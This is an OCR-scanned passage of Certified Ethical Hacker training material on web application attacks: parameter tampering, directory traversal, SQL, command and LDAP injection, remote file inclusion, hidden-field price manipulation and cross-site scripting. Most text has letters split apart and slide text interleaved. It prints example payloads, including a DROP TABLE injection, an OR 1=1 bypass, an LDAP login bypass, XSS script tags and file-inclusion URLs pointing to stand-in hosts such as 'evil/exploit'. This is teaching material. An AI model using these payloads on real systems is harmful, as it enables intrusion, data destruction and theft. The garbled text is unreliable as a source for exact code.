to m a in ta in in fo rm a tio n a b o u t th e c lie n t's session, w h ic h e lim in a te s th e need to m a in ta in a
c o m p le x datab a se on th e se rve r side. URL q ueries, fo rm fie ld s, and cookies are used to pass th e
p a ra m e te rs .
C hanged p a ra m e te rs in th e fo rm fie ld are th e best exa m p le o f p a ra m e te r ta m p e rin g . W h e n a

user selects an H TM L page, it is s to re d as a fo rm fie ld value, and tra n s fe rre d as an HTTP page to
th e w e b a p p lic a tio n . These values m ay be p re -se le cte d (co m b o box, check box, ra d io b u tto n s ,
e tc.), fre e te x t, o r h id d e n . An a tta c k e r can m a n ip u la te th e se values. In som e e x tre m e cases, it is
ju s t like saving th e page, e d itin g th e HTML, and re lo a d in g th e page in th e w e b b ro w se r.

D i r e c t o r y T r a v e r s a l C E H
C«rt1fW4 itkiul Nm Im
v D ir e c to r y T ra v e rs a l
___ W h e n access is p ro v id e d o u ts id e a d e fin e d a p p lic a tio n , th e re exists th e p o s s ib ility o f

u n in te n d e d in fo rm a tio n d isclo su re o r m o d ific a tio n . C o m p le x a p p lic a tio n s exist as a p p lic a tio n
c o m p o n e n ts and d ata , w h ic h are ty p ic a lly c o n fig u re d in m u ltip le d ire c to rie s . An a p p lic a tio n has
th e a b ility to tra v e rs e the se m u ltip le d ire c to rie s to lo ca te and exe cu te th e le g itim a te p o rtio n s o f
an a p p lic a tio n . A d ire c to ry tra v e rs a l/fo rc e fu l b ro w s in g a tta c k occurs w h e n th e a tta c k e r is able
to b ro w se fo r d ire c to rie s and file s o u ts id e th e n o rm a l a p p lic a tio n access. A D ire c to ry
T ra v e rs a l/F o rc e fu l B row sin g a tta c k exposes th e d ire c to ry s tru c tu re o f an a p p lic a tio n , and o fte n
th e u n d e rly in g w e b se rve r and o p e ra tin g system . W ith th is level o f access to th e w e b
a p p lic a tio n a rc h ite c tu re , an a tta c k e r can:
© E n u m e ra te th e c o n te n ts o f file s and d ire c to rie s
© Access pages th a t o th e rw is e re q u ire a u th e n tic a tio n (and possibly p a ym e n t)
© Gain se cre t k n o w le d g e o f th e a p p lic a tio n and its c o n s tru c tio n
© D iscover user IDs and p assw ords b u rie d in h id d e n file s
© Locate source code and o th e r in te re s tin g file s le ft on th e server
© V ie w se n sitive data, such as c u s to m e r in fo rm a tio n

S e c u r it y M is c o n f ig u r a t io n C E H
Easy Exploitation
Using m isconfiguration vulnerabilities, attackers gain
u na u th o rize d accesses to d efa ult accounts, read
unused pages, e xplo it unpatched flaw s, and read o r
w rite unprotected files and directories, etc.
Common Prevalence
Security m isconfiguration can o ccur a t any level
o f an a p p lic a tio n stack, including th e p la tfo rm ,
w eb server, application server, fra m e w o rk, and
custom code
Example
e The application server admin console is automatically
installed and not removed
Default accounts are not changed
Attacker discovers the standard admin pages on server,
logs in w ith default passwords, and takes over
M S e c u r ity M is c o n fig u r a tio n
' ____ " D e velo pe rs and n e tw o rk a d m in is tra to rs sh ould check th a t th e e n tire stack is
c o n fig u re d p ro p e rly o r s e c u rity m is c o n fig u ra tio n can happe n a t any level o f an a p p lic a tio n
stack, in c lu d in g th e p la tfo rm , w e b server, a p p lic a tio n server, fra m e w o rk , and cu sto m code. For
instan ce, if th e se rve r is n o t c o n fig u re d p ro p e rly , th e n it re su lts in va rio u s p ro b le m s th a t can
in fe c t th e s e c u rity o f a w e b s ite . The p ro b le m s th a t lead to such instances in clu d e server
s o ftw a re fla w s , u n p a tc h e d s e c u rity fla w s, e n a b lin g unnecessary services, and im p ro p e r
a u th e n tic a tio n . A fe w o f th e se p ro b le m s can be d e te c te d easily w ith th e help o f a u to m a te d
scanners. A tta c k e rs can access d e fa u lt accounts, unused pages, u n p a tc h e d fla w s, u n p ro te c te d
file s and d ire c to rie s , etc. to gain u n a u th o riz e d access. A ll th e unnecessary and unsafe fe a tu re s
have to be ta k e n care o f and it proves v e ry b e n e ficia l if th e y are c o m p le te ly d isabled so th a t th e
o u ts id e rs d o n 't m ake use o f th e m fo r m a licio u s attacks. All th e a p p lic a tio n -b a s e d file s have to
be ta k e n care o f th ro u g h p ro p e r a u th e n tic a tio n and s tro n g s e c u rity m e th o d s o r crucial
in fo rm a tio n can be leaked to th e a tta cke rs.
Exam ples o f u nn ece ssary fe a tu re s th a t sh ould be disable o r changed in clu d e :
Q The a p p lic a tio n se rve r a d m in console is a u to m a tic a lly in s ta lle d and n o t re m o ve d
© D e fa u lt acco un ts are n o t changed

I n j e c t i o n F l a w s C E H
In jectio n flaw s are w eb a pplication vulnerabilities th a t a llo w u n tru s te d data to be interpreted and executed
as part o f a com m and o r query
Attackers e xplo it injection fla w s by c o n s tru c tin g m alicious co m m an d s o r queries th a t result in data loss o r
co rrup tio n , lack o f accountability, o r denial o f access
Injection fla w s are p re va le n t in legacy code, o fte n fo u n d in SQL, LDAP, and XPath queries, etc. and can be
easily discovered by a pplication vu ln e ra bility scanners and fuzzers
SQL Injection Command Injection LDAP Injection
It invo lve s th e in je ctio n It invo lve s th e in je c tio n It involves th e in je c tio n

o f m alicious SQL queries o f m alicious code th ro u g h o f m alicious LDAP
in to user in p u t fo rm s a w eb a p p lica tio n sta te m e n ts
SQL
S erver
J J
—
In je c tio n F la w s
In je c tio n fla w s are th e lo o p h o le s in th e w e b a p p lic a tio n th a t a llo w u n re lia b le data to

be in te rp re te d and e xe cu te d as p a rt o f a co m m a n d o r q u e ry. The in je c tio n fla w s are being
e x p lo ite d by th e a tta c k e r by c o n s tru c tin g m a licio u s co m m a n d s o r q u e rie s th a t re s u lt in loss o f
da ta o r c o rru p tio n , lack o f a c c o u n ta b ility , o r d e n ia l o f access. In je c tio n fla w s are p re v a le n t in
legacy code, o fte n fo u n d in SQL, LDAP, and XPath qu e rie s, etc. These fla w s can be d e te c te d
easily by a p p lic a tio n v u ln e ra b ility scanners and fuzzers. By e x p lo itin g th e fla w s in th e w e b
a p p lic a tio n , th e a tta c k e r can easily read, w rite , d e le te , and u p d a te any data, i.e., re le v a n t o r
irre le v a n t to th a t p a rtic u la r a p p lic a tio n . T hey are m a n y typ e s o f in je c tio n fla w s; som e o f th e m
are as fo llo w s :
S Q L in je c tio n
SQL in je c tio n is th e m o s t c o m m o n w e b s ite v u ln e ra b ility on th e In te rn e t. It is th e

te c h n iq u e used to ta k e a d va n ta g e o f n o n -v a lid a te d in p u t v u ln e ra b ilitie s to pass SQL co m m a n d s
th ro u g h a w e b a p p lic a tio n fo r e x e c u tio n by a b a cke n d d a ta b a se . In th is, th e a tta c k e r in je cts th e
m a lic io u s SQL q u e rie s in to th e user in p u t fo rm and th is is usu a lly p e rfo rm e d to e ith e r to gain
u n a u th o riz e d access to a datab a se o r to re trie v e in fo rm a tio n d ire c tly fro m th e database.
* C o m m a n d in je c tio n
The fla w s in co m m a n d in je c tio n are a n o th e r ty p e o f w e b a p p lic a tio n v u ln e ra b ility .

S Q L I n j e c t i o n A t t a c k s C E H
J SQL in je c tio n atta cks use a s e rie s o f m a lic io u s SQL q u e rie s to d ire c tly
m a n ip u la te th e d ata ba se
SQL injection
J An a tta cke r can use a v u ln e ra b le w e b a p p lic a tio n to bypass n o rm a l s e c u rity
attacks
m e asu re s and o b ta in d ire c t access to th e v a lu a b le data
J SQL in je c tio n atta cks can o fte n be executed fr o m th e a dd re ss b ar, fro m
w ith in a p p lic a tio n fie ld s , and th ro u g h queries and searches
01 <?php
02 fu n c tio n save e m a il( $ u s e r , $m essage)
W eb ....................... ■‫נ‬ In te r n e t 03 {
B ro w s e r 04 $sql = "IN S E R T IN T O M e s s a g e s (
05 u s e r, m essage
06 ) V A LU E S (
07 ' $ u s e r1, ' $m essage'
t e s t ') ; D R O P T A B LE M e s s a g e s ; - -
08 )
09 re tu rn m y s q l_ q u e r y ( $ s q l) ;
W hen th is code is sent to th e d atabase
10 }
server, it d ro p s th e Messages ta b le
11 ?>
Code t o in s e rt s pa m m y d ata on b e h a lf o f o th e r users SC*L In je c tio n v u ln e ra b le s e rv e r code
A tta c k e r t e s t ') , ( 'u s e r 2 ', '1 am J a s o n ' ) , ( ' u s e r3 ', 'Y o u a re hacked
N o te : For c o m p le te coverage o f SQL Injectio n concepts and techniques, refe r t o M o d u le 14: SQL Injectio n
S Q L In je c tio n A tta c k s
SQL in je c tio n a tta cks use c o m m a n d sequences fro m S tru c tu re d Q u e ry Language (SQL)
s ta te m e n ts to c o n tro l d atabase data d ire c tly . A p p lic a tio n s o fte n use SQL s ta te m e n ts to
a u th e n tic a te users to th e a p p lic a tio n , v a lid a te roles and access levels, sto re and o b ta in
in fo rm a tio n fo r th e a p p lic a tio n and user, and lin k to o th e r data sources. Using SQL in je c tio n
m e th o d s , an a tta c k e r can use a v u ln e ra b le w e b a p p lic a tio n to avoid n o rm a l s e c u rity m easures
and o b ta in d ire c t access to v a lu a b le data.
The reason w h y SQL in je c tio n atta cks w o rk is th a t th e a p p lic a tio n does n o t p ro p e rly v a lid a te
in p u t b e fo re passing it to a SQL s ta te m e n t. For e xa m p le , th e fo llo w in g SQL s ta te m e n t,
select * from ta b le n a m e where U ser1D = 2302 becom es th e fo llo w in g w ith a sim p le SQL
in je c tio n a tta c k :
SELECT * FROM ta b le n a m e WHERE U s e rID = 2302 OR 1=1
The expressio n "OR 1=1" eva lu a te s to th e va lu e "TRUE," o fte n a llo w in g th e e n u m e ra tio n o f all
user ID values fro m th e databa se. SQL in je c tio n a tta cks can o fte n be e n te re d fro m th e address
bar, fro m w ith in a p p lic a tio n fie ld s, and th ro u g h q u e rie s and searches. SQL in je c tio n atta cks can
a llo w an a tta c k e r to :
© Log in to th e a p p lic a tio n w ith o u t su p p lyin g va lid c re d e n tia ls

C o m m a n d I n je c t io n A t t a c k s C E H
J A n a tta c k e r tr ie s t o c r a f t a n in p u t s tr in g t o g a in s h e ll a cce ss t o a w e b s e rv e r
J S h e ll In je c t io n fu n c tio n s in c lu d e s y s t e m ( ) , s t a r t P r o c e s s ( ) ,
j a v a . l a n g . R u n t im e . e x e c ( ) , S y s t e m . D i a g n o s t i c s . P r o c e s s . S t a r t ( ) ,
a n d s im ila r A P Is
T h is t y p e o f a tta c k is u s e d t o d e fa c e w e b s ite s v ir t u a lly . U s in g th is a tta c k , an

a tta c k e r a d d s a n e x tr a H T M L -b a s e d c o n t e n t t o t h e v u ln e r a b le w e b a p p lic a t io n
In H T M L e m b e d d in g a tta c k s , u s e r in p u t t o a w e b s c r ip t is p la c e d in t o t h e o u t p u t
H T M L , w it h o u t b e in g c h e c k e d f o r H T M L c o d e o r s c r ip t in g
J T h e a tta c k e r e x p lo its th is v u ln e r a b ilit y a n d in je c ts m a lic io u s c o d e i n t o s y s te m

f ile s
J h t t p : / /w w w . j u g g y b o y . c o m / v u l n e r a b l e . p h p ? C O L O R = h t tp : / / e v i l / e x p l o i t ?
C o m m a n d In je c tio n A tta c k s
— — C om m an d in je c tio n fla w s a llo w a tta c k e rs to pass m a lic io u s code to d iffe re n t system s

via a w e b a p p lic a tio n . The atta cks in clu d e calls to th e o p e ra tin g system o v e r system calls, use o f
e x te rn a l p ro g ra m s o v e r shell co m m a n d s, and calls to th e backend databases o v e r SQL. Scripts
th a t are w r itte n in Perl, P ython, and o th e r languages exe cu te and in s e rt th e p o o rly designed
w e b a p p lic a tio n s . If a w e b a p p lic a tio n uses any ty p e o f in te rp re te r, a tta cks are in s e rte d to in flic t
dam age.
To p e rfo rm fu n c tio n s , w e b a p p lic a tio n s m u s t use o p e ra tin g system fe a tu re s and e x te rn a l

p ro g ra m s. A lth o u g h m an y p ro g ra m s in vo ke e x te rn a lly , th e fre q u e n tly used p ro g ra m is
S endm ail. W h e n a piece o f in fo rm a tio n is passed th ro u g h th e HTTP e x te rn a l re q u e st, it m u s t be
c a re fu lly s c rub be d, o r th e a tta c k e r can in s e rt special ch a ra cte rs, m a licio u s co m m a n d s, and
c o m m a n d m o d ifie rs in to th e in fo rm a tio n . The w e b a p p lic a tio n th e n b lin d ly passes these
ch a ra c te rs to th e e x te rn a l system fo r e x e c u tio n . In s e rtin g SQL is d a n g e ro u s and ra th e r
w id e s p re a d , as it is in th e fo rm o f c o m m a n d in je c tio n . C om m and in je c tio n atta cks are easy to
c a rry o u t and d iscover, b u t th e y are to u g h to u n d e rs ta n d .
^= = 3 S h e ll I n j e c t i o n
1 To c o m p le te v a rio u s fu n c tio n a litie s , w e b a p p lic a tio n s use va rio u s a p p lic a tio n s and
p ro g ra m s. It is ju s t like se n d in g an em a il by using th e U N IX sendm ail p ro g ra m . T here is
a chance th a t an a tta c k e r m ay in je c t code in to th e se pro g ra m s. This kind o f a tta c k is d ange ro us

C o m m a n d I n je c t io n E x a m p le
A tta c k e r Launching Code

http://juggyboy/cgi‫ ־‬bin/lspro/lspro.cgi?hit_out=1036
In je c tio n A tta ck
M a lic io u s co de :
w w w . ju g g y b o y .c a m /b a im e r .g ifl|n e w p a s s w o r d ||1 0 3 6
^ J u g g y B o y c o m
|6 0 |4 6 8
Use r Nam e
C Addison
Email Address a d d i@ ju g g y b o y .c o ~
S An a tta cke r e n te rs m a lic io u s co de (a cco u n t ‫נ‬
n u m b e r) w ith a n ew p a ssw o rd Site URL ^ w w w .juggyboy.com
‫כ‬
B a nn e r URL [ ■gif | |newpassword|1036|60|468
6 The last tw o sets o f n u m b e rs are th e b a n n e r

Password [ newpassword
size
« O nce th e a tta cke r clicks th e s u b m it b u tto n , th e

p a ssw o rd fo r th e a cco u n t 1 036 is changed to
" n e w p a s s w o rd "
Poor input valid a tion a t server
script was e xploited in this atta ck
9 The se rv e r s c rip t assum es th a t o n ly th e URL o f th a t uses database INSERT and
th e b a n n e r im ag e f ile is in se rte d in to th a t fie ld UPDATE record com m and
C o m m a n d In je c tio n E x a m p le
The fo llo w in g is an e x a m p le o f co m m a n d in je c tio n :
To p e rfo rm a c o m m a n d in je c tio n a tta c k , th e a tta c k e r firs t e n te rs m a licio u s code (a cco u n t

n u m b e r) w ith a n e w passw o rd . The last tw o sets o f n u m b e rs are th e b a n n e r size. O nce th e
a tta c k e r clicks th e s u b m it b u tto n , th e passw ord fo r th e a cc o u n t 1036 is changed to
"n e w p a s s w o rd ." The se rve r s c rip t assum es th a t o n ly th e URL o f th e b a n n e r im age file is
in s e rte d in to th a t fie ld .

F i l e I n j e c t i o n A t t a c k C E H
<?php
GO $ d r in k = 'c o k e ';
if ( is s e t ( $ _ G E T [ 'D R IN K '] )
< form m e t h o d = " g e t"> $ d r iinn k = $ _ G ET [ 'D R IN K '] ;
< s e l e c t name="DRINK"> rr ee qq uu iirree (( J
$ d r in k . ' .p h p ’ ) ;
< o p t io n v a lu e = " p e p s i" > p e p s i< /o p t io n > ?>
< o p t io n v a lu e = " c o k e ‫ >יי‬co k e< / o p t i on>
< /s e le c t>
C in p u t t y p e ="s u b m it ">
< /fo r m >
‫ך‬ : .....
C lie n t code ru n n in g in a b ro w s e r
h t t p : //w w w .j u g g y b o y .c o m /o r d e r s .p h p ? D R I N K = h t t p : / / j a s o n e v a l . c o m / e x p l o i t ? <
e A tta c k e r inje cts a

re m o te ly h o ste d file at
w w w .ja s o n e v a l.c o m
File in je c tio n a tta cks enable a tta cke rs to e x p lo it
v u ln e ra b le s c rip ts o n th e s e rv e r to use a re m o te file
instead o f a p re s u m a b ly tru s te d file fro m th e local
c o n ta in in g an e x p lo it file system
A tta c k e r

©
F ile In je c tio n A tta c k
Users are a llo w e d to u p lo a d v a rio u s file s on th e se rve r th ro u g h va rio u s a p p lic a tio n s

and th o s e file s can be accessed th ro u g h th e In te rn e t fro m a n y w h e re in th e w o rld . If th e
a p p lic a tio n ends w ith a php e x te n sio n and if any user re q u e sts it, th e n th e a p p lic a tio n
in te rp re ts it as a php s c rip t and executes it. This a llo w s an a tta c k e r to p e rfo rm a r b itr a r y
c o m m a n d s . File in je c tio n a tta cks en a b le a tta cke rs to e x p lo it v u ln e ra b le scrip ts on th e se rve r to
use a re m o te file in ste a d o f a p re s u m a b ly tru s te d file fro m th e local file system . C onsider th e
fo llo w in g c lie n t code ru n n in g in a b ro w s e r:
< fo rm m e th o d = " g e t">
< s e le c t nam e="D R IN K">
C o p tio n v a lu e = " p e p s i" > p e p s i< / o p t io n >
C o p tio n v a lu e = " c o k e " > c o k e < / o p t io n >
< /s e le c t>
< in p u t t y p e = " s u b m it ">
< / fo rra >
V u ln e ra b le PHP co de
<?php
$ d r in k = 'c o k e ';

W h a t I s L D A P I n j e c t i o n ? C E H
I (•rtifwtf itfciul ■UtlM
A n LD AP in je c tio n te c h n iq u e is u s e d t o ta k e a d v a n ta g e o f n o n - v a lid a te d w e b
a p p lic a t io n in p u t v u ln e r a b ilit ie s t o p ass L D A P f i l t e r s u s e d f o r s e a r c h in g D ir e c to r y
S e rv ic e s t o o b t a in d ir e c t a c c e s s t o d a ta b a s e s b e h in d a n L D A P t r e e
F ilte r
( a t t r ib u t e N a m e o p e ra to r v a lu e )
Syntax
LDAP D ire c to ry Services
s to re and organize O p e ra to r Example
in fo rm a tio n based on its
(*■ a ttrib u te s . The in fo rm a tio n = ( a b je c tc la s s = u s e r )
a. is hie ra rc h ic a lly organized
as a tre e o f d ire c to ry (m d b S to ra g e Q u o ta > = l00000)
WJ >=
entries
Q
(m d b S to ra g e Q u o ta < = l00000)
J <=
V)
•H p (d i s p 1ayName ~=Foecke1e r )
~=
(0 * (d isp la yN a m e —* J o h n * )
A LDAP is based on th e
* d ie n t-s e rv e r m odel and

clients can search th e
d ire c to ry e n trie s using
AND (&) (& ( o b je c t c la s s - u s e r ) (d is p la y N a m e —John )
filte rs OR ( |) ( |( o b je c t c la s s = u s e r ) (displayN a m e= John)
N O T (!) ( fo b je c tC la s s = g ro u p )
W h a t is L D A P In je c tio n ?
An LDAP (L ig h tw e ig h t D ire c to ry Access P ro to c o l) in je c tio n a tta c k w o rk s in th e sam e

w a y as a SQL in je c tio n a tta c k . All th e in p u ts to th e LDAP m u st be p ro p e rly filte re d , o th e rw is e
v u ln e ra b ilitie s in LDAP a llo w e x e c u tin g u n a u th o riz e d q u e rie s o r m o d ific a tio n o f th e co n te n ts .
LDAP a tta c k s e x p lo it w e b -b a se d a p p lic a tio n s c o n s tru c te d based on LDAP s ta te m e n ts by using a
local pro xy. LDAP s ta te m e n ts are m o d ifie d w h e n c e rta in a p p lic a tio n s fa il. These services sto re
and o rga n ize in fo rm a tio n based on its a ttrib u te s . The in fo rm a tio n is h ie ra rc h ic a lly organized as
a tre e o f d ire c to ry e n trie s . It is based on th e c lie n t-s e rv e r m o d e l and c lie n ts can search th e
d ire c to ry e n trie s using filte rs .

H o w L D A P I n je c t io n W o r k s C E H
n
N orm al Q u e ry
N orm al Q u e ry + Code Injection
LDAP LDAP
N orm al Result N orm al Result a n d /o r
Add itio na l Inform ation
C lien t LDAP S erver C lient LDAP S erver
LDAP in je c tio n attacks are s im ila r to SQL in je c tio n a tta cks b u t e x p lo it u s e r p a ra m e te rs to g e n e ra te LDAP q u e ry
To te s t if an a p p lica tio n is vu ln e ra b le to LDAP code in je c tio n , send a q u e ry to th e s e rv e r m e aning th a t generates

an inva lid in p u t. If th e LDAP s e rve r re tu rn s an e r r o r , it can be e x p lo ite d w ith code in je c tio n te c h n iq u e s
A c c o u n t Login If an attacker enters valid user name "juggyboy",

and injects ju ggyboy)(& )) then the URL string
becomes (&(USER=juggyboy)(&))(PASS=blah)) only
| 1‫ ״‬v ! U sern a m e ju g g y b o y )(& ))

the firs t filte r is processed by the LDAP server, only
the query (&(USER=juggyboy)(&)) is processed.
1V v.\ : P assw ord blah This query is always true, and the attacker logs into
the system w ithout a valid password
A tta c k e r S u b m it
Copyright © by E&Coinal.All Rights Reserved. Reproduction is Strictly Prohibited.
H o w L D A P In je c tio n W o rk s
(H U LDAP in je c tio n a tta cks are c o m m o n ly used on w e b a p p lic a tio n s . LDAP is a p p lie d to any
o f th e a p p lic a tio n s th a t have som e kind o f user in p u ts used to g e n e ra te th e LDAP qu e rie s. To
te s t if an a p p lic a tio n is v u ln e ra b le to LDAP code in je c tio n , send a q u e ry to th e se rve r th a t
g e n e ra te s an in v a lid in p u t. If th e LDAP se rve r re tu rn s an e rro r, it can be e x p lo ite d w ith code
in je c tio n te c h n iq u e s .
D e p e n d in g u p o n th e im p le m e n ta tio n o f th e ta rg e t, one can tr y to achieve:
© Login Bypass
© In fo rm a tio n D isclosure
e P rivilege Escalation
© In fo rm a tio n A lte ra tio n

H id d e n F ie ld M a n ip u la tio n A tta c k I C E H
N o rm a l R e q u e st
HTM L Code
h t tp : / /w w w . ju g g y b o
< f o m m ethod="post"
a c tio n ^ " p a g e .a sp x " > y . c o m /p a g e . a s p x ? p r
<in p u t typ e= " h id d en " name= o d u c t= J u g g y b o y % 2 O S A tta c k R eq u e st
"PRICE" v a l u e 200 . 0 0 " ‫>" ־‬ h i r t & p r i c e = 2 0 0 .0 0
P r o d u ct name: < in p u t ty p e =
" t e x t ‫ ״‬nam e="product" h t t p : / /w w w . j u g g y b o
v a lu e ="Juggyboy S h i r t " X b r> y . c o m /p a g e . a s p x ? p r
P r o d u ct p r i c e : 2 0 0 .0 0 " X b r > o d u o t= J u g g y b o y % 2 0 S
< in p u t type=" subm it" v a lu e = h ir t & p r ic e = 2 . 00
" subm it" >
< /fo rm >
$ W hen a user makes s elections on an HTML page, th e selection is ty p ic a lly stored as fo rm

field values and sent t o th e a p p lic a tio n as an HTTP re q u e s t (GET o r POST)
P ro d u c t N am e J u g g y b o y S h irt ^
0 H TM L can also s to re field values as hidden fields, w h ich are n o t re n d e re d to th e screen by
th e brow ser, b u t are collected and s u b m itte d as param eters d urin g fo rm subm issions
P ro d u c t Price [ 200 )
S u b m it 6 A tta ckers can exam ine th e HTML code o f th e page and change th e hidden fie ld values in
o rd e r to change po s t requests t o server
H id d e n F ie ld M a n ip u la tio n A tta c k
H idden m a n ip u la tio n a tta cks are m o s tly used against e ‫־‬c o m m e rc e w e b site s to d a y .
M a n y o n lin e stores face th e se p ro b le m s . In e ve ry c lie n t session, d e ve lo p e rs use h id d e n fie ld s to
s to re c lie n t in fo rm a tio n , in c lu d in g p rice o f th e p ro d u c t (In clu d in g d is c o u n t rates). A t th e tim e o f
d e v e lo p m e n t o f th e se such p ro g ra m s, d e ve lo p e rs fe e l th a t all th e a p p lic a tio n s d e ve lo p e d by
th e m are safe, b u t a hacker can m a n ip u la te th e prices o f th e p ro d u c t and c o m p le te a
tra n s a c tio n w ith price th a t he o r she has a lte re d , ra th e r th a n th e a ctual price o f th e p ro d u c t.
For e x a m p le : On eBay, a p a rtic u la r m o b ile p h o n e is fo r sale fo r $ 1 000 and th e hacker, by

a lte rin g th e price, gets it fo r o n ly $10.
This is a huge loss fo r w e b s ite o w n e rs. To p ro te c t th e ir n e tw o rk s fro m a ttacks, w e b s ite o w n e rs

are using th e la te s t a n tiv iru s s o ftw a re , fire w a lls , in tru s io n d e te c tio n system s, etc. If th e ir
w e b s ite is a tta c k e d , o fte n it also loses its c re d ib ility in th e m a rk e t.
W h e n any ta rg e t re q ue sts w e b services and m akes choices on th e H TM L page, th e n th e choices

are saved as fo rm fie ld values and d e liv e re d to th e re q u e ste d a p p lic a tio n as an HTTP re q u e st
(GET o r POST). The HTM L pages g e n e ra lly save fie ld values as h id d e n fie ld s and th e y are n o t
d isp layed on th e m o n ito r o f th e ta rg e t b u t saved and placed in th e fo rm o f strings o r
p a ra m e te rs a t th e tim e o f fo rm su b m ission. A tta c k e rs can exa m in e th e HTM L code o f th e page
and change th e h id d e n fie ld values in o rd e r to change p o st re q u e sts to th e server.
< in p u t t y p e = ‫ ״‬h id d e n " name= "P R IC E " v a lu e = " 2 0 0 . 0 0 ‫> ״‬

C ro s s -s ite s c r ip t in g ( ,XSS' o r'C S S ') a tta c k s e x p lo it v u ln e r a b ilit ie s in d y n a m ic a lly g e n e r a te d w e b p ag e s,

w h ic h e n a b le s m a lic io u s a tta c k e rs t o in je c t c lie n t- s id e s c r ip t in t o w e b p a g e s v ie w e d b y o t h e r u s e rs
It o c c u rs w h e n in v a lid a te d in p u t d a ta is in c lu d e d in d y n a m ic c o n t e n t t h a t is s e n t t o a u s e r's w e b b r o w s e r
f o r r e n d e r in g
A tta c k e rs in je c t m a lic io u s J a v a S c rip t, V B S c rip t, A c tiv e X , H TM L, o r Flash f o r e x e c u tio n o n a v ic tim 's s y s te m by

h id in g i t w it h in le g itim a te re q u e s ts
‫ם‬ ^ M alicious script execution Session hijacking
^ Redirecting to a malicious server Brute force password cracking
privileges user Exploiting I I D ata th e ft ^
‫^ ^׳‬ Ads in hidden !FRAMES and pop-ups In tra n e t probing '1
m an ipulation Data Keylogging

^ and re m o te m o nitoring
C o p y r ig h t © b y E&C01nal.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d
C r o s s - S ite S c r ip tin g (X S S ) A t t a c k s
C ross-site s c rip tin g is also called XSS. V u ln e ra b ilitie s o ccu r w h e n an a tta c k e r uses w e b
a p p lic a tio n s and sends m a licio u s code in JavaScript to d iffe re n t end users. It occurs w h e n
in v a lid a te d in p u t data is in c lu d e d in d y n a m ic c o n te n t th a t is se n t to a user's w e b b ro w s e r fo r
re n d e rin g . W h e n a w e b a p p lic a tio n uses in p u t fro m a user, an a tta c k e r can c o m m e n c e an
a tta c k using th a t in p u t, w h ic h can p ro p a g a te to o th e r users as w e ll. A tta c k e rs in je c t m a licio u s
JavaScript, V B S cript, A ctiveX , HTML, o r Flash fo r e x e c u tio n on a v ic tim 's system by h id in g it
w ith in le g itim a te requests. The end user m ay tru s t th e w e b a p p lic a tio n , and th e a tta c k e r can
e x p lo it th a t tru s t in o rd e r to do th in g s th a t w o u ld n o t be a llo w e d u n d e r n o rm a l c o n d itio n s . An
a tta c k e r o fte n uses d iffe r e n t m e th o d s to enco d e th e m a lic io u s p o rtio n (U nicode) o f th e tag, so
th a t a re q u e s t seem s g e n u in e to th e user. Som e o f th e m are:
© M a lic io u s s c rip t e x e c u tio n - Session hija ckin g
© B ru te fo rc e passw ord cra cking - R e d ire ctin g to a m a licio u s se rve r
Q E x p lo itin g user p rivile g e s - Data th e ft
Q In tra n e t p ro b in g - Ads in h id d e n !FRAMES and p op-ups
© Data m a n ip u la tio n - K eylogging and re m o te m o n ito rin g

H o w X S S A t t a c k s W o r k C E H
N o rm a l R e q u e st T h is e x a m p le u s e s a
ra b le p a g e w h ic h h a n d le s
f o r a n o n e x is t e n t p a g e s,
a c la s s ic 4 0 4 e r r o r p ag e
( H a n d le s r e q u e s ts f o r a
n o n e x is te n t p a g e , a
c la s s ic 4 0 4 e r r o r p a g e )
S e rv e r
h t t p : / / ju g g y b o y . c o m / < s c r ip t > a le r t ( "WARNING: The a p p lic a t i o n

has e n c o u n te re d an e r r o r ‫ < ; ) ״‬/ s o r i p t >
S H o w X S S A tta c k s W o rk
To u n d e rs ta n d h o w cross-site s c rip tin g is ty p ic a lly e x p lo ite d , co n sid e r th e fo llo w in g

h y p o th e tic a l e xa m p le .
N orm al Request
h t t p : / / ju g g y b o y .c o m / ‫ כ‬a s o n _ f i l « . h t m l
404 Not found
/ j a s o n _ f i l e . h tm l
S e rv e r C ode (H an d les re q u e sts fo r a
S erver Response n o n e x is te n t page, a
< h fc m l> c las tic 4 0 A e r ro r p a g e )
<body>
< ? p hp
p r i n t "N ot fo u n d : "
XSS Attack Code u r ld e a o d e ($_SERVER["
REQUEST_URI"] ) ;
Server Response
?>

n
< /h t m l> Server
h t t p : / / j u g g y b o y . c o a a / < 3 c r i p t > a l e r t ( " W A R N I N G : T he a p p l i c a t i o n

h a s • n c o u n t« r * d a n •rx ro r" ) ; < / s c r i p t >
FIGURE 13.15: How XSS Attacks Work

C r o s s - S ite S c r ip tin g A tta c k

C E H
S c e n a r io : A t t a c k v ia E m a il
H i, Y o u h a v e w o n a U ser clicks
lo t t e r y o f $ 2 M , d ick th e m alicious link
t h e li n k t o c la im it.
<A
H R E F = h ttp ;//ju g g y b o y .
S e n d s e m a il w it h
c o m /....
m a lic io u s lin k
S e rve r se n d s a
Name: Shaun page to th e u ser
Age: 31 w i t h c lie n t p r o f ile
Location: UK
Occupation: SE
^ <..................
M a lic io u s c o d e is e x e c u t e d
Last visH: Sept 21,2010
o n t h e c lie n t w e b b r o w s e r
A tta c k e r
In th is exam ple, th e a tta cke r c ra fts an em ail m essage w ith a m alicious s c rip t and sends it to th e v ic tim :
<A HREF=h t t p : / / l e g i t i m a t e S i t e . c o m / r e g i s t r a t io n . c g i? c lie n t p r o file = < S C R IP T >
m a lic io u s c o d e c /S C R I P T » C lic k h e re < /A >
W h e n th e user clicks on th e lin k, th e URL is s e n t to le g itim a te S ite .c o m w ith th e m alicious code
The le g itim a te se rv e r sends a page back to th e user in c lu d in g th e v a lu e o f c l i e n t p r o f i l e , and th e m alicious

code is executed on th e c lie n t m a chin e
C r o s s - S ite S c r ip tin g A tta c k S c e n a r io : A t t a c k v ia E m a il
In a crosssite s c rip tin g a tta c k via em a il, th e a tta c k e r cra fts an em a il th a t co n ta in s a lin k
to m a lic io u s s c rip t and sends it to th e v ic tim .
M a lic io u s S crip t:
<A HREF=h t t p : / / l e g i t i m a t e S i t e . c o m / r e g i s t r a t i o n . c g i? c lie n t p r o f ile = < S C R I P T >
m a lic io u s c o d e < /S C R IP T » C lic k h e re < /A >
W h e n th e user clicks on th e lin k, th e URL is se n t to le g itim a te S ite .c o m w ith th e m a licio u s code.

Then th e se rve r sends a page back to th e user in c lu d in g th e va lu e o f c lie n t p ro file and th e
m a lic io u s code is e xe cu te d on th e c lie n t's m achine.
The fo llo w in g d ia g ra m d e p ic ts th e cross-site s c rip tin g a tta c k sce n a rio a tta c k via em a il:

X S S E x a m p le : A t t a c k v ia E m a il C E H
rrr 1
L e g itim a te
